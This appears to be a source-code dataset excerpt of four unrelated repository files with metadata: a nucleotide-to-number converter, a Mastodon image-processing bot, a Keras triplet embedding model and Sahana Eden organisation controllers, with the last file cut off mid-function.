d7a5618562bc73b14d44a2a51ee851bf97f4f032 | 5,600 | py | Python | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | MainInterface.py | DwardEE/nucleotide-sequence-num-converter | edb77c78f8ac5bd7feb1e9b368572617c44d4886 | [
"MIT"
] | null | null | null | import DataTranslate
if __name__ == "__main__":
main()
| 37.333333 | 81 | 0.505893 | import DataTranslate
def quad_array(sequence):
    """Map a nucleotide string to base-4 digits (A=0, C=1, G=2, T/U=3).

    :param sequence: upper-case nucleotide string (DNA or RNA).
    :return: list of ints, or the string "invalid" if any character is not
        a recognised nucleotide.
    """
    # Bug fix: the original tested ``i == "U"`` (the integer loop index
    # against a string), so "U" was never recognised; map the character
    # itself instead.
    mapping = {"A": 0, "C": 1, "G": 2, "T": 3, "U": 3}
    final = []
    for ch in sequence:
        if ch not in mapping:
            return "invalid"
        final.append(mapping[ch])
    return final
def write_file(sequence, name, filename):
    """Append one FASTA record to *filename*: a '>name' header line
    followed by *sequence* wrapped at 70 characters per line."""
    with open(filename, "a") as out:
        out.write(">" + name + "\n")
        for start in range(0, len(sequence), 70):
            out.write(sequence[start:start + 70] + "\n")
def quaternary_translator():
    """Interactive loop: read a nucleotide sequence from the console or a
    FASTA file, then repeatedly print (and optionally write) its value in
    binary, decimal or hexadecimal form via DataTranslate.

    Entering "e" at any prompt exits the whole program via quit().
    """
    nucleotide_header = ""
    seq = []
    # Choose the input source; loop until a valid choice ('c' or 'f') or exit.
    while True:
        method = input("Select method of input, (f)ile (c)onsole: ")
        if method == "c" or method == "f":
            break
        if method == "e":
            quit()
    if method == "c":
        # Console input: re-prompt until quad_array accepts the sequence.
        while True:
            nucleotide_header = input("Enter the nucleotide sequence's "
                                      "name: ")
            if nucleotide_header == "e":
                quit()
            seq = quad_array(input("Enter the nucleotide sequence: "))
            if seq == "e":
                quit()
            if seq != "invalid":
                break
    elif method == "f":
        # FASTA file input: first line is the header, the rest the sequence.
        # NOTE(review): the file handle ``f`` is never closed, and a missing
        # file raises FileNotFoundError instead of re-prompting.
        seq_string = ""
        while True:
            filename = input("Enter filename: ")
            if filename == "e":
                quit()
            f = open(filename, "r")
            if f.mode == "r":
                break
        f1 = f.readlines()
        # Drop the first and last characters of the header line --
        # presumably the leading '>' and the trailing newline.
        nucleotide_header = f1[0][1:-1]
        for i in range(1, len(f1)):
            seq_string = seq_string + f1[i][:-1]
        seq = quad_array(seq_string)
    # Translation menu loop; runs until the user exits with "e".
    while True:
        choice = input(
            "Enter the base translation: (q2d) quaternary to decimal, "
            "(q2b) quaternary to binary, (q2h) quaternary to hexadecimal ("
            "r)eturn array: ")
        if choice == "q2b":
            print(nucleotide_header + " Binary Form/Base 2")
            print(DataTranslate.q2b_translation(seq))
            write_input = input(
                "Would you like to write the results to a file? (y) or (n) ")
            if write_input == "e" or write_input == "n":
                quit()
            # NOTE(review): this branch uses ``if`` where the q2d/q2h
            # branches use ``elif``; equivalent here, but inconsistent.
            if write_input == "y":
                filename = input("Which file do you want to write to? ")
                write_file(DataTranslate.q2b_translation(seq),
                           nucleotide_header, filename)
        elif choice == "q2d":
            print(nucleotide_header + " Decimal Form/Base 10 (value, "
                  "sequence length)")
            print(DataTranslate.q2d_translation(seq))
            write_input = input(
                "Would you like to write the results to a file? (y) or (n) ")
            if write_input == "e" or write_input == "n":
                quit()
            elif write_input == "y":
                filename = input("Which file do you want to write to? ")
                write_file(DataTranslate.q2d_translation(seq),
                           nucleotide_header, filename)
        elif choice == "q2h":
            print(nucleotide_header + " Hexadecimal Form/Base 16(value, "
                  "sequence length)")
            print(DataTranslate.q2h_translation(seq))
            write_input = input(
                "Would you like to write the results to a file? (y) or (n) ")
            if write_input == "e" or write_input == "n":
                quit()
            elif write_input == "y":
                filename = input("Which file do you want to write to? ")
                write_file(DataTranslate.q2h_translation(seq),
                           nucleotide_header, filename)
        elif choice == "r":
            print(nucleotide_header + " Quaternary Array/Base 4 Array")
            print(seq)
        elif choice == "e":
            quit()
        else:
            print("Invalid input")
def translate2quaternary():
    """Interactively translate a binary, decimal or hexadecimal value back
    into a quaternary nucleotide sequence and print it in FASTA style.

    Entering "e" at either of the first two prompts exits via quit().
    """
    nucleotide_header = input("Enter the name of the nucleotide sequence: ")
    if nucleotide_header == "e":
        quit()
    base = input("Which base would you like to translate from (2), (10), "
                 "(16): ")
    if base == "e":
        quit()
    elif base == "10":
        seq = input("Please input the decimal string: ")
        length = input("Please input the sequence length: ")
        print(">" + nucleotide_header)
        print(DataTranslate.d2q_translation(int(seq), int(length)))
    elif base == "16":
        seq = input("Please input the hexadecimal string: ")
        length = input("Please input the sequence length: ")
        print(">" + nucleotide_header)
        # NOTE(review): ``int(seq)`` parses the input as base 10 before
        # handing it to h2q_translation -- confirm whether ``int(seq, 16)``
        # was intended for a hexadecimal string.
        print(DataTranslate.h2q_translation(int(seq), int(length)))
    elif base == "2":
        seq = input("Please input the binary string: ")
        print(">" + nucleotide_header)
        print(DataTranslate.b2q_translation(seq))
def main():
    """Entry point: dispatch to nucleotide-to-number translation ('t') or
    number-to-nucleotide translation ('q'); any other input falls through."""
    print("Welcome to ProjectA!")
    print("Enter (e) at any time to exit")
    mode = input("Nucleotide sequence (t)ranslation or translation to ("
                 "q)uaternary nucleotide sequence: ")
    if mode == "t":
        print("File input should be in FASTA *.txt format, while console input "
              "will be in raw nucleotide sequence")
        quaternary_translator()
    elif mode == "q":
        translate2quaternary()
translate2quaternary()
if __name__ == "__main__":
main()
| 5,399 | 0 | 125 |
db3ff0290d7b1dd8b959965512f11ef3d7a7662c | 6,165 | py | Python | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | 2 | 2020-10-26T21:35:59.000Z | 2020-11-13T18:32:51.000Z | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | null | null | null | start_mastodon.py | Czino/bitcoin-is-the-sun | 54181f135b89b083d0a3739754d869f110f733b4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import logging
import sys
import cv2
import time
import os.path
from PIL import Image
import imageUtils
import videoUtils
import numpy
import requests
from mastodon import Mastodon
import config_mastodon as cf
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
dirname = os.path.dirname(__file__)
mastodon = Mastodon(
client_id = cf.credentials['consumer_key'],
client_secret = cf.credentials['consumer_secret'],
access_token = cf.credentials['access_token'],
api_base_url = cf.credentials['base_url']
)
mastodon.log_in(
username = cf.credentials['login'],
password = cf.credentials['password'],
scopes = ['read', 'write']
)
# Seed the persisted notification cursor on first run; '1' means
# "process every notification from the beginning".
if not os.path.isfile(os.path.join(dirname, 'sinceId_mastodon.txt')):
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
        saveFile.write('1')
# Main polling loop: reload the cursor, process new mentions, persist the
# newest notification id, then sleep two minutes between polls.
# NOTE(review): checkMentions is not defined in this excerpt of the
# script -- presumably defined earlier in the full file; verify.
while True:
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'r') as readFile:
        sinceId = readFile.read()
        sinceId = int(sinceId)
    # Handle mentions containing a trigger keyword; returns the newest id.
    sinceId = checkMentions(mastodon, ['light', 'sparkles'], sinceId)
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
        saveFile.write(str(sinceId))
    logger.info('Waiting...')
    time.sleep(120)
import logging
import sys
import cv2
import time
import os.path
from PIL import Image
import imageUtils
import videoUtils
import numpy
import requests
from mastodon import Mastodon
import config_mastodon as cf
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
dirname = os.path.dirname(__file__)
mastodon = Mastodon(
client_id = cf.credentials['consumer_key'],
client_secret = cf.credentials['consumer_secret'],
access_token = cf.credentials['access_token'],
api_base_url = cf.credentials['base_url']
)
mastodon.log_in(
username = cf.credentials['login'],
password = cf.credentials['password'],
scopes = ['read', 'write']
)
def processToot(toot, username, replyTo, bold):
    """Scan a toot's media attachments, run the highlight detection on
    each supported image or video, and reply to the mention with the
    processed media (or a "cannot see the light" message for images).

    :param toot: Mastodon status whose media attachments are processed
    :param username: account name to @-mention in the reply
    :param replyTo: status id the reply is attached to
    :param bold: True when the user requested the bolder effect
    :return: True if the toot carried at least one media attachment
    """
    hasMedia = False
    if hasattr(toot, 'media_attachments'):
        for media in toot.media_attachments:
            hasMedia = True
            fileName = str(media['id'])
            mediaType = media['type']
            mediaUrl = media['url']
            if mediaType == 'image':
                hasMedia = True
                # Download the image and decode it in-memory with OpenCV.
                response = requests.get(mediaUrl).content
                nparr = numpy.frombuffer(response, numpy.uint8)
                image = cv2.imdecode(nparr,cv2.IMREAD_UNCHANGED)
                # Only JPG/PNG URLs are supported for the image pipeline.
                if mediaUrl.lower().find('jpg') != -1 or mediaUrl.lower().find('png') != -1:
                    newImage, hasSeenTheLightInImage = imageUtils.processImage(image, bold)
                    if hasSeenTheLightInImage:
                        cv2.imwrite(os.path.join(dirname, f'processed/' + fileName + '.jpg'), newImage)
                        logger.info(f'Success, reply to {toot.id}')
                        # Upload the processed image and attach it to the reply.
                        media_ids = []
                        res = mastodon.media_post(media_file=os.path.join(dirname, f'processed/{fileName}.jpg'),)
                        media_ids.append(res.id)
                        try:
                            mastodon.status_post(
                                status='I have seen the light! @' + username,
                                in_reply_to_id=replyTo,
                                media_ids=media_ids
                            )
                        except:
                            # NOTE(review): bare except + exc_info()[0] logs only
                            # the exception type, not the message -- consider
                            # logger.exception() here.
                            e = sys.exc_info()[0]
                            logger.error(e)
                    else:
                        # Detection found nothing; reply without media.
                        logger.info(f'No highlights detected {toot.id}')
                        try:
                            mastodon.status_post(
                                status='I cannot see the light in this picture. @' + username,
                                in_reply_to_id=replyTo
                            )
                        except:
                            e = sys.exc_info()[0]
                            logger.error(e)
                else:
                    logger.info(f'Not supported format for {mediaUrl}')
            if mediaType == 'video' or mediaType == 'gifv':
                # Videos are written to disk first; videoUtils processes
                # the file and returns the path of the rendered result.
                video = requests.get(mediaUrl, allow_redirects=True)
                open(os.path.join(dirname, f'processed/{fileName}.mp4'), 'wb').write(video.content)
                pathToVideo = videoUtils.processVideo(
                    os.path.join(dirname, f'processed/{fileName}.mp4'),
                    fileName,
                    os.path.join(dirname, f'processed'),
                    bold
                )
                media_ids = []
                res = mastodon.media_post(media_file=pathToVideo)
                media_ids.append(res.id)
                try:
                    mastodon.status_post(
                        status='I have seen the light! @' + username,
                        in_reply_to_id=replyTo,
                        media_ids=media_ids
                    )
                except:
                    # NOTE(review): exc_info()[1] (the exception value) is used
                    # here while the image branches use exc_info()[0] (the
                    # type) -- inconsistent, preserved as-is.
                    e = sys.exc_info()[1]
                    print(e)
                    logger.error(e)
                # NOTE(review): returning here stops after the first video
                # attachment, skipping any remaining attachments --
                # presumably to avoid duplicate replies; confirm.
                return hasMedia
    return hasMedia
def checkMentions(mastodon, keywords, sinceId):
    """Poll mention notifications newer than sinceId and process those
    whose text contains any of the trigger keywords.

    For a matching mention, the mentioning toot itself is processed
    first; if it carries no media, the toot it replies to (if any) is
    tried instead.

    :param mastodon: authenticated Mastodon client
    :param keywords: iterable of lower-case trigger words
    :param sinceId: only notifications newer than this id are fetched
    :return: highest notification id seen (sinceId unchanged on failure)
    """
    logger.info(f'Retrieving mentions since {sinceId}')
    newSinceId = int(sinceId)
    try:
        notifications = mastodon.notifications(since_id=sinceId, mentions_only=True)
    except:
        # NOTE(review): bare except; exc_info()[0] logs only the exception
        # type -- logger.exception() would capture the full traceback.
        e = sys.exc_info()[0]
        logger.error(e)
        return newSinceId
    for notification in notifications:
        if notification['type'] == 'mention':
            # Track the newest id so the caller can persist the cursor.
            newSinceId = max(notification.id, newSinceId)
            username = notification.status.account.username
            replyTo = notification.status.id
            if any(keyword in notification.status.content.lower() for keyword in keywords):
                logger.info(f'Answering to {username} {replyTo}')
                # "/bold" anywhere in the mention selects the bolder effect.
                bold = '/bold' in notification.status.content.lower()
                if bold:
                    print('Bold image requested')
                # check if actual toot has media
                try:
                    toot = mastodon.status(replyTo)
                    replyToot = None
                    hasMedia = processToot(toot, username, replyTo, bold)
                    # check if toot is in reply to
                    if hasMedia is False and hasattr(toot, 'in_reply_to_id'):
                        print('original toot has no media, proceed to check if replied toot exists')
                        replyToot = mastodon.status(toot.in_reply_to_id)
                        if replyToot is not None:
                            hasMedia = processToot(replyToot, username, replyTo, bold)
                except:
                    e = sys.exc_info()[0]
                    logger.error(e)
    return newSinceId
# Seed the persisted notification cursor on first run; '1' means
# "process every notification from the beginning".
if not os.path.isfile(os.path.join(dirname, 'sinceId_mastodon.txt')):
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
        saveFile.write('1')
# Main polling loop: reload the cursor, process new mentions, persist the
# newest notification id, then sleep two minutes between polls.
while True:
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'r') as readFile:
        sinceId = readFile.read()
        sinceId = int(sinceId)
    # Handle mentions containing a trigger keyword; returns the newest id.
    sinceId = checkMentions(mastodon, ['light', 'sparkles'], sinceId)
    with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
        saveFile.write(str(sinceId))
    logger.info('Waiting...')
    time.sleep(120)
d15b9cab2300f96393dedc3c96fb1d23b15f600a | 4,613 | py | Python | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | 1 | 2020-07-17T05:58:47.000Z | 2020-07-17T05:58:47.000Z | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | null | null | null | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | null | null | null | import numpy as np
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Dense, Input, Lambda
from keras.optimizers import Adam
from sklearn.metrics import roc_auc_score
from utility.triplet import l2Norm, euclidean_distance, triplet_loss, accuracy
from utility.model import predict
| 37.504065 | 125 | 0.635162 | import numpy as np
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Dense, Input, Lambda
from keras.optimizers import Adam
from sklearn.metrics import roc_auc_score
from utility.triplet import l2Norm, euclidean_distance, triplet_loss, accuracy
from utility.model import predict
class GlobalTripletModel:
    """Triplet-loss siamese network that refines input paper embeddings
    into 64-d embeddings in which same-author papers are closer together
    than different-author papers.
    """

    def __init__(self, dimension=100):
        """Build the (untrained) triplet network.

        :param dimension: size of the input embedding vectors.
        """
        self.model = None
        self.dimension = dimension
        self.create()

    def create(self):
        """Assemble the shared-weight triplet architecture and compile it."""
        emb_anchor = Input(shape=(self.dimension, ), name='anchor_input')
        emb_pos = Input(shape=(self.dimension, ), name='pos_input')
        emb_neg = Input(shape=(self.dimension, ), name='neg_input')

        # Shared layers: anchor / positive / negative all pass through the
        # same Dense stack followed by L2 normalisation.
        layer1 = Dense(128, activation='relu', name='first_emb_layer')
        layer2 = Dense(64, activation='relu', name='last_emb_layer')
        norm_layer = Lambda(l2Norm, name='norm_layer', output_shape=[64])

        encoded_emb = norm_layer(layer2(layer1(emb_anchor)))
        encoded_emb_pos = norm_layer(layer2(layer1(emb_pos)))
        encoded_emb_neg = norm_layer(layer2(layer1(emb_neg)))

        pos_dist = Lambda(euclidean_distance, name='pos_dist')([encoded_emb, encoded_emb_pos])
        neg_dist = Lambda(euclidean_distance, name='neg_dist')([encoded_emb, encoded_emb_neg])

        def cal_output_shape(input_shape):
            # Stacking the two distance tensors doubles the last axis.
            shape = list(input_shape[0])
            assert len(shape) == 2  # only valid for 2D tensors
            shape[-1] *= 2
            return tuple(shape)

        stacked_dists = Lambda(
            lambda vects: K.stack(vects, axis=1),
            name='stacked_dists',
            output_shape=cal_output_shape
        )([pos_dist, neg_dist])

        self.model = Model([emb_anchor, emb_pos, emb_neg], stacked_dists, name='triple_siamese')
        self.model.compile(loss=triplet_loss, optimizer=Adam(lr=0.01), metrics=[accuracy])
        # inter_layer = Model(inputs=self.model.get_input_at(0), outputs=self.model.get_layer('norm_layer').get_output_at(0))

    def fit(self, data):
        """Train on a dict of 'anchor_input' / 'pos_input' / 'neg_input' arrays.

        The targets are dummies: the triplet loss only consumes the stacked
        distances, so an array of ones with shape (n, 2) suffices.
        """
        triplets_count = data["anchor_input"].shape[0]
        self.model.fit(data, np.ones((triplets_count, 2)), batch_size=64, epochs=5, shuffle=True, validation_split=0.2)

    def get_inter(self, paper_embs):
        """Return the 64-d normalised embeddings for raw input embeddings
        by evaluating the network up to the shared norm layer.
        """
        # NOTE(review): layers[5] is assumed to be the norm_layer output for
        # the anchor branch -- revisit if the architecture in create() changes.
        get_activations = K.function(self.model.inputs[:1] + [K.learning_phase()], [self.model.layers[5].get_output_at(0), ])
        activations = get_activations([paper_embs, 0])
        return activations[0]

    def full_auc(self, test_triplets):
        """Evaluate triplet accuracy and pairwise ROC-AUC on held-out
        triplets, both before and after the learned transformation.

        :param test_triplets: dict with 'anchor_input', 'pos_input' and
            'neg_input' arrays of shape (n, dimension).
        :return: AUC computed on the transformed embeddings.
        """
        embs_anchor = test_triplets["anchor_input"]
        embs_pos = test_triplets["pos_input"]
        embs_neg = test_triplets["neg_input"]

        inter_embs_anchor = self.get_inter(embs_anchor)
        inter_embs_pos = self.get_inter(embs_pos)
        inter_embs_neg = self.get_inter(embs_neg)

        accs = []
        accs_before = []
        # BUG FIX: these accumulators were used with "+=" below but never
        # initialised, raising NameError on the first iteration.
        grnds = []
        preds = []
        preds_before = []

        for i, e in enumerate(inter_embs_anchor):
            if i % 10000 == 0:
                print('test', i)
            emb_anchor = e
            emb_pos = inter_embs_pos[i]
            emb_neg = inter_embs_neg[i]
            test_embs = np.array([emb_pos, emb_neg])

            emb_anchor_before = embs_anchor[i]
            emb_pos_before = embs_pos[i]
            emb_neg_before = embs_neg[i]
            test_embs_before = np.array([emb_pos_before, emb_neg_before])

            predictions = predict(emb_anchor, test_embs)
            predictions_before = predict(emb_anchor_before, test_embs_before)

            # The positive sample should be strictly closer than the negative.
            acc_before = 1 if predictions_before[0] < predictions_before[1] else 0
            acc = 1 if predictions[0] < predictions[1] else 0
            accs_before.append(acc_before)
            accs.append(acc)

            # Ground truth for AUC: distance to pos labelled 0, to neg 1.
            grnd = [0, 1]
            grnds += grnd
            preds += predictions
            preds_before += predictions_before

        auc_before = roc_auc_score(grnds, preds_before)
        auc = roc_auc_score(grnds, preds)
        print('test accuracy before', np.mean(accs_before))
        print('test accuracy after', np.mean(accs))
        print('test AUC before', auc_before)
        print('test AUC after', auc)
        return auc

    def save(self, path):
        """Serialize the architecture to <path>.json and the weights to
        <path>-triplets-<dimension>.h5.
        """
        # The with-statement closes the file; the old explicit f.close()
        # inside the block was redundant and has been removed.
        with open(path + ".json", 'w') as f:
            f.write(self.model.to_json())
        self.model.save_weights(path + "-triplets-{}.h5".format(self.dimension))

    def load(self, path):
        """Restore a model previously stored by save()."""
        with open(path + ".json", 'r') as f:
            self.model = model_from_json(f.read())
        self.model.load_weights(path + "-triplets-{}.h5".format(self.dimension))
| 4,061 | 4 | 211 |
5337f46cba30d2be87fc1ebdfa5eed1b33e39d99 | 18,425 | py | Python | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | 1 | 2019-08-20T16:32:33.000Z | 2019-08-20T16:32:33.000Z | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | null | null | null | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Organization Registry - Controllers
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
item = None
if settings.has_module("cms"):
table = s3db.cms_post
_item = db(table.module == module).select(table.id,
table.body,
limitby=(0, 1)).first()
if _item:
if s3_has_role(ADMIN):
item = DIV(XML(_item.body),
BR(),
A(T("Edit"),
_href=URL(c="cms", f="post",
args=[_item.id, "update"],
vars={"module":module}),
_class="action-btn"))
else:
item = XML(_item.body)
elif s3_has_role(ADMIN):
item = DIV(H2(module_name),
A(T("Edit"),
_href=URL(c="cms", f="post", args="create",
vars={"module":module}),
_class="action-btn"))
if not item:
#item = H2(module_name)
# Just redirect to the Facilities Map
redirect(URL(f="facility", args=["map"]))
# tbc
report = ""
response.view = "index.html"
return dict(item=item, report=report)
# -----------------------------------------------------------------------------
def sector():
""" RESTful CRUD controller """
# Pre-processor
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def subsector():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def site():
"""
RESTful CRUD controller
- used by S3SiteAutocompleteWidget(), which doesn't yet support filtering
to just updateable sites
"""
# Pre-processor
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sites_for_org():
"""
Used to provide the list of Sites for an Organisation
- used in User Registration
"""
try:
org = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Org provided!")
else:
table = s3db.org_site
query = (table.organisation_id == org)
records = db(query).select(table.id,
table.name,
orderby=table.name)
result = records.json()
finally:
response.headers["Content-Type"] = "application/json"
return result
# -----------------------------------------------------------------------------
def site_org_json():
"""
Provide the Org(s) belonging to a Site
- unused?
"""
table = s3db.org_site
otable = s3db.org_organisation
query = (table.site_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# -----------------------------------------------------------------------------
def facility_marker_fn(record):
"""
Function to decide which Marker to use for Facilities Map
@ToDo: Use Symbology
"""
table = db.org_facility_type
types = record.facility_type_id
if isinstance(types, list):
rows = db(table.id.belongs(types)).select(table.name)
else:
rows = db(table.id == types).select(table.name)
types = [row.name for row in rows]
# Use Marker in preferential order
if "Hub" in types:
marker = "warehouse"
elif "Medical Clinic" in types:
marker = "hospital"
elif "Food" in types:
marker = "food"
elif "Relief Site" in types:
marker = "asset"
elif "Residential Building" in types:
marker = "residence"
#elif "Shelter" in types:
# marker = "shelter"
else:
# Unknown
marker = "office"
if settings.has_module("req"):
# Colour code by open/priority requests
reqs = record.reqs
if reqs == 3:
# High
marker = "%s_red" % marker
elif reqs == 2:
# Medium
marker = "%s_yellow" % marker
elif reqs == 1:
# Low
marker = "%s_green" % marker
mtable = db.gis_marker
try:
marker = db(mtable.name == marker).select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
except:
marker = db(mtable.name == "office").select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
return marker
# -----------------------------------------------------------------------------
def facility():
""" RESTful CRUD controller """
# Pre-processor
s3.prep = prep
s3.postp = postp
output = s3_rest_controller(rheader=s3db.org_rheader)
return output
# -----------------------------------------------------------------------------
def facility_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def office_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_organisation_controller()
# -----------------------------------------------------------------------------
def org_search():
"""
Organisation REST controller
- limited to just search.json for use in Autocompletes
- allows differential access permissions
"""
s3.prep = lambda r: r.representation == "json" and \
r.method == "search"
return s3_rest_controller(module, "organisation")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def office():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_office_controller()
# -----------------------------------------------------------------------------
def person():
""" Person controller for AddPersonWidget """
s3.prep = prep
return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def room():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def mailing_list():
""" RESTful CRUD controller """
tablename = "pr_group"
table = s3db[tablename]
# Only groups with a group_type of 5
response.s3.filter = (table.group_type == 5)
table.group_type.writable = False
table.group_type.readable = False
table.name.label = T("Mailing List Name")
s3.crud_strings[tablename] = s3.pr_mailing_list_crud_strings
# define the list_fields
list_fields = s3db.configure(tablename,
list_fields = ["id",
"name",
"description",
])
# Components
_rheader = s3db.pr_rheader
_tabs = [(T("Organisation"), "organisation/"),
(T("Mailing List Details"), None),
]
if len(request.args) > 0:
_tabs.append((T("Members"), "group_membership"))
if "viewing" in request.vars:
tablename, record_id = request.vars.viewing.rsplit(".", 1)
if tablename == "org_organisation":
table = s3db[tablename]
_rheader = s3db.org_rheader
_tabs = []
s3db.add_component("pr_group_membership", pr_group="group_id")
rheader = lambda r: _rheader(r, tabs = _tabs)
return s3_rest_controller("pr",
"group",
rheader=rheader)
# -----------------------------------------------------------------------------
def donor():
""" RESTful CRUD controller """
tablename = "org_donor"
table = s3db[tablename]
tablename = "org_donor"
s3.crud_strings[tablename] = Storage(
title_create = ADD_DONOR,
title_display = T("Donor Details"),
title_list = T("Donors Report"),
title_update = T("Edit Donor"),
title_search = T("Search Donors"),
subtitle_create = T("Add New Donor"),
label_list_button = T("List Donors"),
label_create_button = ADD_DONOR,
label_delete_button = T("Delete Donor"),
msg_record_created = T("Donor added"),
msg_record_modified = T("Donor updated"),
msg_record_deleted = T("Donor deleted"),
msg_list_empty = T("No Donors currently registered"))
s3db.configure(tablename, listadd=False)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests for Sites """
return s3db.req_match()
# -----------------------------------------------------------------------------
def incoming():
"""
Incoming Shipments for Sites
@unused
"""
return inv_incoming()
# END =========================================================================
| 34.633459 | 102 | 0.449335 | # -*- coding: utf-8 -*-
"""
Organization Registry - Controllers
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
item = None
if settings.has_module("cms"):
table = s3db.cms_post
_item = db(table.module == module).select(table.id,
table.body,
limitby=(0, 1)).first()
if _item:
if s3_has_role(ADMIN):
item = DIV(XML(_item.body),
BR(),
A(T("Edit"),
_href=URL(c="cms", f="post",
args=[_item.id, "update"],
vars={"module":module}),
_class="action-btn"))
else:
item = XML(_item.body)
elif s3_has_role(ADMIN):
item = DIV(H2(module_name),
A(T("Edit"),
_href=URL(c="cms", f="post", args="create",
vars={"module":module}),
_class="action-btn"))
if not item:
#item = H2(module_name)
# Just redirect to the Facilities Map
redirect(URL(f="facility", args=["map"]))
# tbc
report = ""
response.view = "index.html"
return dict(item=item, report=report)
# -----------------------------------------------------------------------------
def sector():
    """ RESTful CRUD controller """
    # Pre-processor
    def prep(r):
        # Location Filter
        # Restrict the listing to the user's currently selected region.
        s3db.gis_location_filter(r)
        return True
    s3.prep = prep
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def subsector():
    """ RESTful CRUD controller """
    # Plain REST dispatch: no pre/post-processing hooks needed here.
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def site():
"""
RESTful CRUD controller
- used by S3SiteAutocompleteWidget(), which doesn't yet support filtering
to just updateable sites
"""
# Pre-processor
def prep(r):
if r.representation != "json" or \
r.method != "search":
return False
# Location Filter
s3db.gis_location_filter(r)
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sites_for_org():
    """
    Used to provide the list of Sites for an Organisation
    - used in User Registration

    Expects the organisation id as the first URL argument and returns a
    JSON list of matching org_site rows (id + name, ordered by name).
    Replies with a JSON 400 message when no argument is supplied.
    """
    try:
        org = request.args[0]
    except:
        # No organisation id present in the URL
        result = current.xml.json_message(False, 400, "No Org provided!")
    else:
        table = s3db.org_site
        query = (table.organisation_id == org)
        records = db(query).select(table.id,
                                   table.name,
                                   orderby=table.name)
        result = records.json()
    finally:
        # Always reply as JSON, success or failure
        response.headers["Content-Type"] = "application/json"
    return result
# -----------------------------------------------------------------------------
def site_org_json():
"""
Provide the Org(s) belonging to a Site
- unused?
"""
table = s3db.org_site
otable = s3db.org_organisation
query = (table.site_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# -----------------------------------------------------------------------------
def facility_marker_fn(record):
    """
    Function to decide which Marker to use for Facilities Map
    @ToDo: Use Symbology

    :param record: an org_facility record carrying facility_type_id and,
        when the Requests module is enabled, an aggregated "reqs" value
    :return: a gis_marker Row (image, height, width)
    """
    table = db.org_facility_type
    types = record.facility_type_id
    # facility_type_id may be a single id or a list of ids
    if isinstance(types, list):
        rows = db(table.id.belongs(types)).select(table.name)
    else:
        rows = db(table.id == types).select(table.name)
    types = [row.name for row in rows]
    # Use Marker in preferential order
    if "Hub" in types:
        marker = "warehouse"
    elif "Medical Clinic" in types:
        marker = "hospital"
    elif "Food" in types:
        marker = "food"
    elif "Relief Site" in types:
        marker = "asset"
    elif "Residential Building" in types:
        marker = "residence"
    #elif "Shelter" in types:
    #    marker = "shelter"
    else:
        # Unknown
        marker = "office"
    if settings.has_module("req"):
        # Colour code by open/priority requests
        reqs = record.reqs
        if reqs == 3:
            # High
